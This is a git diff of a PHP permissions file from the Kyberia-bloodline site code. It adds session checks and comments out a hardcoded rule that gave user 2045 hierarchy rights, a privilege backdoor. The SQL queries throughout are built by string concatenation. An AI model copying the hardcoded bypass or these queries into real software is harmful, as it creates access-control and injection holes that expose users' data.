X-Git-Url: http://git.harvie.cz/?a=blobdiff_plain;f=wwwroot%2Finc%2Fpermissions.inc;h=e6c2eb95ce7322c4b33d88a5589811dd3f5b1cbf;hb=37e8d23972984a127bec7c4faa237e5a80e1068e;hp=942a3f44038641fb744dcec887183643efb38741;hpb=51ff32267c4949bad6a8dddc502cbc01ed56edc8;p=mirrors%2FKyberia-bloodline.git

diff --git a/wwwroot/inc/permissions.inc b/wwwroot/inc/permissions.inc
index 942a3f4..e6c2eb9 100644
--- a/wwwroot/inc/permissions.inc
+++ b/wwwroot/inc/permissions.inc
@@ -5,13 +5,18 @@ class permissions {
 function isHierarch($node) {
 
 	global $db;
-	$user_id=$_SESSION['user_id'];
+	if (IsSet($_SESSION['user_id'])) {
+	        $user_id=$_SESSION['user_id'];
+	} else {
+	        $user_id=0;
+	}
 	if (!$user_id) return false;
+
 	$node_vector=chunk_split($node['node_vector'],VECTOR_CHARS,';');
 	$hierarchy=explode(';',$node_vector);
 	foreach ($hierarchy as $hierarch) {
 		$hierarch=ltrim($hierarch,0);
-		$q="select nodes.node_creator,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$_SESSION['user_id']."' where nodes.node_id='$hierarch'";
+		$q="select nodes.node_creator,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$user_id."' where nodes.node_id='$hierarch'";
 		$result=$db->query($q);
 		$result->next();
 		if ($result->getString('node_creator')==$user_id)
@@ -20,8 +25,8 @@ function isHierarch($node) {
 			return true;
 		if ($result->getString('node_creator')=='operator')
 			return true;
-		if ($user_id == 2045)
-			return true;
+//		if ($user_id == 2045)  // OMG
+//			return true;
 	}
 	return false;
 
@@ -29,10 +34,14 @@ function isHierarch($node) {
 
 function checkPermissions($node) {
 global $db;
-$user_id=$_SESSION['user_id'];
+if (IsSet($_SESSION['user_id'])) {
+	$user_id=$_SESSION['user_id'];
+} else {
+	$user_id=0;
+}
 
 /*
-thousand lights to Hierarchy!
+thousand lights   // OMGto Hierarchy!
 (check&set procedure for giving permissions for non-public subnodes according
 to bottom-top Hierarchy
 */
@@ -41,7 +50,7 @@ if (($node['node_system_access']!='public' and $node['node_system_access']!='cry
 	$hierarchy=array_reverse(explode(';',$node_vector));
 	foreach ($hierarchy as $hierarch) {
 		$hierarch=ltrim($hierarch,0);
-		$q="select nodes.node_creator,nodes.node_system_access,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$_SESSION['user_id']."' where nodes.node_id='$hierarch'";
+		$q="select nodes.node_creator,nodes.node_system_access,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$user_id."' where nodes.node_id='$hierarch'";
 		$result=$db->query($q);
 		$result->next();
 		$hierarchy_bounce[]=$hierarch;
@@ -55,10 +64,10 @@ if (($node['node_system_access']!='public' and $node['node_system_access']!='cry
 		elseif ($result->getString('node_permission')!='') {
 			array_pop($hierarchy_bounce);
 			$node['node_permission']=$result->getString('node_permission');
-				$q="update node_access set node_permission='".$result->getString('node_permission')."' where node_id='".$node['node_id']."' and user_id='".$_SESSION['user_id']."'";
+				$q="update node_access set node_permission='".$result->getString('node_permission')."' where node_id='".$node['node_id']."' and user_id='".$user_id."'";
 				$updated=$db->update($q);
 				if (!$updated && IsSet($_SESSION['user_id'])) {
-					$q="insert into node_access set node_permission='".$result->getString('node_permission')."', node_id='".$node['node_id']."',user_id='".$_SESSION['user_id']."'";
+					$q="insert into node_access set node_permission='".$result->getString('node_permission')."', node_id='".$node['node_id']."',user_id='".$user_id."'";
 					$db->query($q);
 				}
 			break;
@@ -68,10 +77,10 @@ if (($node['node_system_access']!='public' and $node['node_system_access']!='cry
 		elseif ($result->getString('node_creator')==$user_id) {
 			array_pop($hierarchy_bounce);
 			$node['node_permission']='access';
-				$q="update node_access set node_permission='access' where node_id='".$node['node_id']."' and user_id='".$_SESSION['user_id']."'";
+				$q="update node_access set node_permission='access' where node_id='".$node['node_id']."' and user_id='".$user_id."'";
 				$updated=$db->update($q);
 				if (!$updated && IsSet($_SESSION['user_id'])) {
-					$q="insert into node_access set node_permission='access', node_id='".$node['node_id']."',user_id='".$_SESSION['user_id']."'";
+					$q="insert into node_access set node_permission='access', node_id='".$node['node_id']."',user_id='".$user_id."'";
 					$db->query($q);
 				}
 			break;
@@ -85,12 +94,12 @@ if (($node['node_system_access']!='public' and $node['node_system_access']!='cry
 
 
 //setting permissions for not logged in users
-if ($_SESSION['user_id']==$node['node_creator']) {
-		$permissions['r']=true;
-		$permissions['w']=true;
+if ($user_id==$node['node_creator']) {
+	$permissions['r']=true;
+	$permissions['w']=true;
 }
 
-elseif (!$_SESSION['user_id']) {
+elseif (!$user_id) {
 
 	if ($node['node_external_access']=='yes' AND ($node['node_system_access']=='public' OR $node['node_system_access']=='moderated' OR $node['node_system_access']=='cube')) {
 		$permissions['r']=true;